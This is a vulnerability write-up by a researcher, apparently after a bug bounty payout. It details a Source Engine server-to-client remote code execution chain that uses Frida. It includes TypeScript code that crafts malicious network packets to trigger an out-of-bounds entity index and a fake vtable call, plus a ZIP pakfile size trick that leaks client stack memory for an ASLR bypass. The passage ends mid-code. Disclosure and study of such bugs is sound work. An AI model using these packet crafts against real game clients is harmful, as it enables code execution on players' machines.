
Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been a while. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs, one memory corruption and one infoleak, to achieve code execution, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, and L4D2 (no game-specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimenting with the Frida framework as a way to interface with the engine through TypeScript.

Problems with SourceMod (since the last post)

If you read my last blog post, you know that I was using SourceMod as a way to script up my local dedicated server and test bugs I found for validity. While auditing this time around, it quickly became apparent that most of the obvious bugs in the original Source 2013 codebases were already patched. But without confirming the fixes myself, I couldn’t rule the bugs out, so a lot of my initial time was spent writing SourceMod scripts and testing. While SourceMod has a pretty fleshed-out scripting environment, it uses the SourcePawn language, which is a bit dated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required compiling C++ plugins against their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who work in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.
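To make this concrete, here’s a minimal sketch of what the “client” half can look like. I’m using Frida’s Node.js bindings (the frida npm package) rather than Python so everything stays in TypeScript; the agent file name here is illustrative, not from the actual PoC.

// Minimal Frida "client": attach to the game and load the agent ("server") into it.
import * as frida from "frida";
import * as fs from "fs";

async function main(): Promise<void> {
    // Attach to the running game process by name
    const session = await frida.attach("hl2.exe");

    // Load the compiled agent script into the game
    const source = fs.readFileSync("_agent.js", "utf-8");
    const script = await session.createScript(source);

    // Print anything the agent reports back via send()
    script.message.connect(message => {
        console.log("[agent]", JSON.stringify(message));
    });

    await script.load();
}

main().catch(console.error);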

After getting that simple client and server set up for Frida, I created a TypeScript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that engine objects very often take advantage of C++ polymorphism and expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual TypeScript objects I could call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.
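Under the hood, a wrapper like this boils down to a couple of pointer reads plus a NativeFunction with the right calling convention. Here’s a minimal sketch of the idea; the helper names and the vtable slot number are mine, purely for illustration:

// Read the function pointer stored at a given slot of an object's vtable.
function virtualFunction(thisPtr: NativePointer, index: number): NativePointer {
    const vtable = thisPtr.readPointer();  // first dword of the object
    return vtable.add(index * Process.pointerSize).readPointer();
}

// Wrap a virtual method using __thiscall (the engine binaries are 32-bit).
function getNetChannelInfo(client: NativePointer): NativePointer {
    const fn = new NativeFunction(
        virtualFunction(client, 72),        // slot number is illustrative only
        "pointer", ["pointer"], "thiscall"  // 'this' is passed as the first arg
    );
    return fn(client) as NativePointer;
}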

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.
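As a trivial example, hooking an export takes only a few lines. CreateInterface is a real export of engine.dll (it appeared in the snippet above); the rest of this is a sketch:

// Log every interface the game requests through engine.dll's CreateInterface.
const createInterface = Module.findExportByName("engine.dll", "CreateInterface");
if (createInterface !== null) {
    Interceptor.attach(createInterface, {
        onEnter(args) {
            // First argument is the interface version string
            this.name = args[0].readUtf8String();
        },
        onLeave(retval) {
            console.log(`CreateInterface("${this.name}") -> ${retval}`);
        }
    });
}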

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilizes the ret-sync project to communicate with a loaded copy of IDA at runtime. What this lets me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to resolve their addresses. The intent was to make the exploit scripts much more stable across game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then does some work with engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported between engine updates using BinDiff automagically, making it easy to keep offsets current as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it in any more Source adventures for the foreseeable future. I encourage readers with backgrounds in pwntools and CTFing to consider trying Frida against desktop binaries. I gained a lot from learning it, and I feel the desktop reversing/VR/exploitation community should adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easiest type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing so long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these types of bugs is to find some buffer overflow, build a ROP chain out of the module xinput.dll, which has ASLR marked as disabled, and execute shellcode from that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find this on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address; in fact, xinput.dll relocates just fine, and can sometimes be found at a different address if another module’s load conflicts with the address xinput.dll asks for. Basically, due to the way xinput.dll asks to be loaded, the system chooses not to randomize its base address, so it inherently defeats ASLR: you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again through the years. Surprisingly though, in TF2 there is no xinput.dll to utilize for an ASLR defeat. This actually makes TF2, which runs on the older engine branch, significantly harder to exploit than CS:GO, Valve’s flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice, I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is due to the general architecture of the engine’s networking, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being handed back to the caller, unlike your typical system malloc implementation. Uninitialized heap memory is unfortunately not a valid target for an infoleak.

One option for getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. Carving out areas of heap memory for your exploit requires careful attention to specifically sized holes of memory and the timing at which those holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities in the Source engine, but I will note that, due to its custom allocator, allocations are much more predictable than with the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that whatever you corrupt for your information leak, you need to ensure it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value sent back is either the integer value of the ConVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs, mostly because they were trivial stack-based buffer overflows, or because they were present in one game but not the others.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that the value is sane and crash the game if it isn’t. But this is not what happens in practice: in release builds of the game, Assert statements are not compiled in at all. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo lives inside a globally defined structure, entitylist, inside of client.dll. This object holds the client’s central store of all data related to game entities. Since m_EntityCacheInfo is at a static global offset, we can easily calculate the proper value of entnum for our exploit by locating the offset of m_EntityCacheInfo in any given version of client.dll and computing the entnum value that produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable, as long as it is aligned to an 8-byte boundary (since sizeof(EntityCacheInfo_t) == 8). This is important for chaining the exploit later.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

[Image: IDA disassembly of the PreDataUpdate virtual call, call dword ptr [eax+24]]

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString: we craft our pointer so that it lands directly on &m_pszString. When the bug calls our function, the engine will believe that &m_pszString is the object’s pointer, and the value of m_pszString will be treated as the object’s vtable pointer. The engine will then call the function pointer at *((*m_pszString)+0x18) (vtable index 6). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the fake vtable to the right place, this gives us control over the instruction pointer!

m_pszString is at offset 0x1C in the ConVar structure above, but the terms of our vulnerability require that the returned pointer be aligned to an 8-byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, and whose m_pszString is aligned correctly for GetClientNetworkable to return it.

This can be seen by what GetClientNetworkable looks like in x64dbg:

[Image: GetClientNetworkable disassembled in x64dbg]

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

[Image: sv_mumble_positionalaudio at 0x10C6B788 in client.dll, viewed in IDA]

This means that to calculate the address of m_pszString, we add 0x1C: 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an offset of 0xC580B4, which is only aligned to 4. So, now we can calculate whether this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!
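Putting the disassembly and the alignment math together, the index calculation is easy to script. Here’s a sketch that works on absolute runtime pointers; the 0x28 comes from the x64dbg disassembly above, and of course all offsets are per-build:

// Solve pointer = entitylist + entnum*8 + 0x28 for entnum, so that
// GetClientNetworkable() returns &sv_mumble_positionalaudio->m_pszString.
function calcEntnum(target: NativePointer, entitylist: NativePointer): number {
    const delta = target.sub(entitylist.add(0x28)).toInt32();
    if (delta % 8 !== 0) {
        throw new Error("candidate pointer is not 8-byte aligned");
    }
    return delta / 8; // the out-of-bounds array index
}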

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.
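The ReplicateCVar helper used later in the exploit script just writes a NET_SetConVar message into the outgoing packet stream. Here is a hedged sketch of what it might look like, assuming the usual NET_SetConVar wire format (a count byte followed by null-terminated name/value pairs) and the same bf_write bindings used elsewhere in this post; the net_SetConVar constant is my assumption:

// Replicate a ConVar value onto the client via a NET_SetConVar message.
function ReplicateCVar(bf: bf_write, name: string, value: string) {
    bf.WriteUBitLong(net_SetConVar, NETMSG_BITS) // message type
    bf.WriteByte(1)                              // one cvar in this message
    bf.WriteString(name)                         // null-terminated name
    bf.WriteString(value)                        // null-terminated value
}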

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table. (The full dereference chain is sketched below.)
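Written out with Frida pointer reads, the chain the engine will follow looks like this (a sketch, assuming the ConVar global is named in the IDA database so the ret-sync helper can resolve it):

// Emulate the dereference chain CL_CopyExistingEntity will perform.
const mumbleCvar = se.util.require_symbol("sv_mumble_positionalaudio");
const pEnt = mumbleCvar.add(0x1c);              // &m_pszString, our fake object
const vtable = pEnt.readPointer();              // m_pszString = fake vtable ptr
const target = vtable.add(6 * 4).readPointer(); // slot 6 of the fake vtable
// ...the engine then performs: target(pEnt) -> instruction pointer control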

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled directly by the contents of the NET_Tick packet. This means we can assign it an arbitrary 32-bit value. It just so happens that this value is stored in a global as well! After some scripting in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

[Image: Frida output confirming tickcount is fully controlled by NET_Tick]

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

[Image: debugger showing 0x41414141 popped into the instruction pointer at the ret]

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can easily be found using the Ropper project. After finding an appropriate pivot, we can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done has used relative offsets, but we don’t even know where to point the value of 0x41414141 on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the ZIP file as a sort of “virtual overlay” on the regular filesystem the game uses to read/write files. This means that for any file access the game makes, it will check the map’s pakfile to see if it can read the file from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function responsible for determining the size of the file that is going to be uploaded to the server, and whether it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

[Image: decompiled ZIP directory parsing, showing lookup.m_nLength = zipFileHeader.uncompressedSize]

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is a signed comparison. What happens when totalBytes is negative? It sails straight past the length check.

If we are able to hack a file with a negative length into the ZIP structure, the engine will happily upload it to the server.
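To see exactly why the check passes, here’s the comparison reproduced in a few lines (the size value is just an example with the sign bit set):

// The ZIP header's 32-bit size, reinterpreted as signed like the C code does.
const uncompressedSize = 0xfffffff0;      // attacker-controlled ZIP field
const totalBytes = uncompressedSize | 0;  // force to signed 32-bit: -16
const limit = 64 * 1024 * 1024;           // e.g. a net_maxfilesize of 64 MB

console.log(totalBytes);                  // -16
console.log(totalBytes >= limit);         // false -> the size check passes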

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading the data out to a temporary buffer on the stack. The subchannel believes this file to be very large (it interprets the size as an unsigned integer), so the networking code will indefinitely send chunks to the server by allocating 0x100 bytes of stack space and calling ->Read(). But when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data, as there is nothing left to read. Rather than failing out of the function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared between iterations, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue sending fragments indefinitely, since the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

[Image: hex dump of the hacked pakfile entry with a negative uncompressed size]
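The core trick of that script, shown here as a hedged TypeScript stand-in (the real PoC is Python and handles the full BSP layout), is to locate the target entry’s local file header inside the pakfile and overwrite its 32-bit uncompressed size with a value whose sign bit is set. The field offsets follow the PKZIP spec; note the engine may read the size from the central directory record instead, which the real script also handles.

import * as fs from "fs";

// Patch the uncompressed size of a named entry in a map's (stored) pakfile.
function patchPakfileEntry(bspPath: string, entryName: string): void {
    const data = fs.readFileSync(bspPath);
    const sig = Buffer.from("PK\x03\x04", "latin1"); // local file header magic

    let off = data.indexOf(sig);
    while (off !== -1) {
        const nameLen = data.readUInt16LE(off + 26);  // file name length field
        const name = data.toString("ascii", off + 30, off + 30 + nameLen);
        if (name === entryName) {
            data.writeUInt32LE(0xfffffff0, off + 22); // negative as an int32
            break;
        }
        off = data.indexOf(sig, off + 4);
    }
    fs.writeFileSync(bspPath, data);
}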

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

[Image: in-game console with net_showfragments 1 listing the file fragments being sent]

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

[Image: Frida hook output showing the file size function returning a negative number]

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100-byte buffer are not always in the same place, so some heuristics definitely go a long way here. A simple mapping of the DWORD values inside the buffer over time shows that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to reliably leak a known pointer value with ~100% certainty.
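A sketch of such a heuristic, as it might look inside the server-side collection hook (the 0x7B/0x7C upper bytes match this particular run; a real filter would track candidates across many fragments):

// Scan a leaked 0x100-byte fragment for DWORDs that look like code pointers.
function findPointerCandidates(frag: NativePointer): NativePointer[] {
    const candidates: NativePointer[] = [];
    for (let off = 0; off < 0x100; off += 4) {
        const value = frag.add(off).readU32();
        const top = value >>> 24;
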